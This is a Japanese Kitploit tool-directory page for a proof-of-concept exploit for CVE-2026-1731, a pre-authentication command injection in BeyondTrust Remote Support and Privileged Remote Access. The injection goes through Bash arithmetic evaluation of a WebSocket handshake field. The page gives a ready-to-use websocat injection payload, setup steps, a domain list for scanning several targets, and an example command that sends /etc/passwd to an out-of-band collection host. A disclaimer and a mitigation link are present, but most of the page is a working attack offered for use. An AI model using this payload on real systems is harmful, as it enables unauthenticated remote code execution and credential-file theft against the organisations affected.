Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1731 — CVE-2026-1731 - WebSocket から到達可能なスクリプトにおける安全でない Bash 算術評価に起因する、BeyondTrust Remote Support および Privileged Remote Access の重大なコマンドインジェクションの脆弱性。 | Kitploit
ツール/GitHubGitHub/win3zz/cve-2026-1731
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubwin3zz/cve-2026-1731

CVE-2026-1731

CVE-2026-1731 - WebSocket から到達可能なスクリプトにおける安全でない Bash 算術評価に起因する、BeyondTrust Remote Support および Privileged Remote Access の重大なコマンドインジェクションの脆弱性。

リポジトリを見る
35847ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-1731 BeyondTrust Remote Support 事前認証RCE PoC

[!WARNING] このスクリプトは教育および研究目的のみを意図しています。明示的な許可なしにシステムに対して使用しないでください。不正アクセスやテストは違法かつ非倫理的です。このスクリプトを使用する前に完全な免責事項をお読みください。

概要

このスクリプトは、BeyondTrust Remote Support (RS) および Privileged Remote Access (PRA) に影響する重大なコマンドインジェクションの脆弱性 (CVE-2026-1731) を実証します。この問題は、以前に注目された CVE-2024-12356 に関与した同じ WebSocket で到達可能なエンドポイントに由来しており、密接に関連する変種です。

この脆弱性は、サーバーの thin-scc-wrapper スクリプトが攻撃者が制御する入力に対して算術比較を実行することに起因します。具体的には、WebSocket ハンドシェイク中に送信される remoteVersion 値が対象です。Bash は数値比較のオペランドを単なる文字列ではなく式として扱うため、a[$(cmd)]0 のような細工されたペイロードが評価中に任意のコマンド実行を引き起こす可能性があります。

BeyondTrust が今回のパッチサイクルで数値の健全性チェックを追加したとしても、その後の Bash による式評価を防ぐことはできず、エンドポイントは悪用可能なままです。攻撃者は、認証前に WebSocket 接続を開いて悪意のあるバージョン値を送信するだけでコード実行を達成できます。

ペイロード

root@kitploit:~
echo -ne "hax[\$(ATTACKER-COMMAND)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://AFFECTED-SYSTEM:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -

依存関係

root@kitploit:~
pip3 install requests

websocat のダウンロード

root@kitploit:~
wget -O websocat https://github.com/vi/websocat/releases/download/v1.14.1/websocat.x86_64-unknown-linux-musl
chmod +x websocat

(Python スクリプトと同じフォルダに配置してください。)

またはシステム全体に移動します:

root@kitploit:~
sudo mv websocat /usr/local/bin/

同じディレクトリに domains.txt を作成

テストしたい URL を追加します:

root@kitploit:~
example1.com
example2.com
example3.com

スクリプトの使用方法

WebSocket エクスプロイトに実行させたいコマンドを設定するには、スクリプト内の次の行を編集します:

root@kitploit:~
CMD = "YOUR-COMMAND-HERE"

例:

root@kitploit:~
CMD = "curl -X POST -d @/etc/passwd http://XXXXXXXXX.oast.fun/"

コマンドを設定したら、スクリプトを実行します:

root@kitploit:~
python3 exploit.py

または、実行可能にして直接実行します:

root@kitploit:~
chmod +x exploit.py
./exploit.py
1 2

緩和策

  • https://www.beyondtrust.com/trust-center/security-advisories/bt26-02

参照

  • 元の分析 - https://attackerkb.com/topics/jNMBccstay/cve-2026-1731/rapid7-analysis
ツールをダウンロード